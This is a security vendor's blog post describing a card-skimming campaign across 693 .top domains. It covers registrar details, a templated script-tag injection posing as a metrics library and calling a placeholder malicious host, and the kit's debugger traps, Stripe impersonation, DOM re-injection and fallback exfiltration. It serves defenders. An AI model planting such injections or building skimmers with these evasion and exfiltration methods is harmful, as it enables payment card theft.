SecurityMetrics Uncovers a 700 Site Global Skimming Operation

SecurityMetrics forensic experts have identified a 700 site skimming operation using a sophisticated, multi-channel kit designed to lock out analysts and mimic legitimate payment providers.

Forensics
Data Discovery
Data Breaches
Data Security Trends
SecurityMetrics Uncovers a 700 Site Global Skimming Operation

Credit card skimming is no longer just about a few lines of messy code. Skimming now resembles intricate, well-planned threat campaigns. 

Recently, the SecurityMetrics Forensic Analysis team identified a massive, synchronized campaign involving 693 active credit card skimmers.

What SecurityMetrics Forensic Analysts found beneath the surface was a technically advanced skimmer kit designed to evade detection, impersonate legitimate payment forms, and exfiltrate stolen card data through multiple redundant channels. 

Because of our unique position in the industry, SecurityMetrics is currently the only entity with the data to link these disparate attacks to a single infrastructure fingerprint.

The Infrastructure Fingerprint

This campaign is defined by a highly deliberate infrastructure choice designed for rapid domain rotation and low cost per domain. All 693 malicious domains share a specific registration profile:

  • The TLD: Registered under the .top generic TLD.
  • The Registrar: NiceNIC International Group Co., Limited (IANA #3765), headquartered in Hong Kong.
  • The Mask: All domains resolve through Cloudflare nameservers, giving them the performance benefits and IP-masking properties of a legitimate CDN.

This combination provides a veneer of legitimacy, making automated blocklisting difficult. For security teams monitoring traffic, these are the registrar details associated with the threat:

REGISTRAR DETAILS

NiceNIC International Group Co., Limited • IANA #3765 • Hong Kong, China • abuse@nicenic.net

The Injection Method

The skimmer is injected via an external <script> tag, disguised as a site metrics library. The attackers use a site-specific path—the victim’s own domain name as a subdirectory—to give each target its own payload endpoint:

HTML

<script type="text/javascript"

  src="https://[maliciousdomain].top/[sitename]/metrics.js"

  id="custom-[timestamp]-js"></script>

The payload is a JavaScript file heavily obfuscated using a control-flow flattening technique with hex-encoded variable names and a rotating string array, making standard signature-based detection nearly impossible.

Technical Analysis: Advanced Evasion

Our forensic deep dive revealed several high-level functions that separate this kit from "run-of-the-mill" malware.

1. Anti-Analysis & DevTools Detection

The skimmer employs a debugger-timing trap to identify if a human analyst is watching. It records a performance.now() timestamp, triggers a debugger; statement, and measures the elapsed time.

If the time exceeds a threshold (100ms), indicating a human has paused on the breakpoint, the skimmer writes a kill flag to localStorage and terminates execution. On subsequent loads, it checks for this flag and silently exits, effectively "locking out" security researchers from seeing the malicious logic.

2. Form Interception & Stripe Impersonation

The kit uses regex-based input field identification to catch data even on non-standard forms, scanning for attributes like card, expiry, or cvv. To complete the deception, it loads card brand icons directly from Stripe’s CDN (js.stripe.com). By rendering these icons alongside its own fields, it creates a convincing visual match for Stripe-powered checkout forms.

3. DOM Surveillance via MutationObserver

The skimmer deploys multiple MutationObserver instances to detect changes to the checkout page in real time.

  • Re-injection: If the payment form is dynamically reloaded (common in AJAX checkouts), the skimmer re-injects its logic.
  • Restore Logic: If a security tool attempts to remove the injected elements, the skimmer's "restore" logic immediately re-injects the overlay form HTML.

Multi-Channel Data Exfiltration

This is where the campaign gets particularly aggressive. It uses a three-tier exfiltration strategy with automatic failover to ensure stolen data reaches the C2 (Command and Control) server:

  1. Primary (WebSocket): The skimmer opens a persistent WebSocket connection. Data is base64-encoded and dispatched immediately to avoid duplication.
  2. Fallback (navigator.sendBeacon): If WebSockets are unavailable, it uses the Beacon API. This is designed to survive page navigations, ensuring the data is sent even if the user clicks away or closes the tab.
  3. Last Resort (Image/Fetch): If all else fails, the kit uses traditional fetch requests and image pixel beacons to bypass network-level blocking.

Why This Matters

This threat actor campaign isn't just stealing data– it's actually identifying victims. 

The exfiltrated data object includes the user's browser agent and the compromised site's origin, allowing the operator to sort stolen credentials by merchant.

In a landscape where attackers are using professional-grade infrastructure, you need forensic-grade protection. SecurityMetrics consistently monitors and discovers data trends, like this skimming operation, so SecurityMetrics customers can rest assured their data is protected. 

Talk to a SecurityMetrics forensic analyst expert today to protect your sensitive data. 

Join thousands of security professionals.
Subscribe Now
Get the guide to PCI Compliance
Download
Get a quote for Incident Response
Request a Quote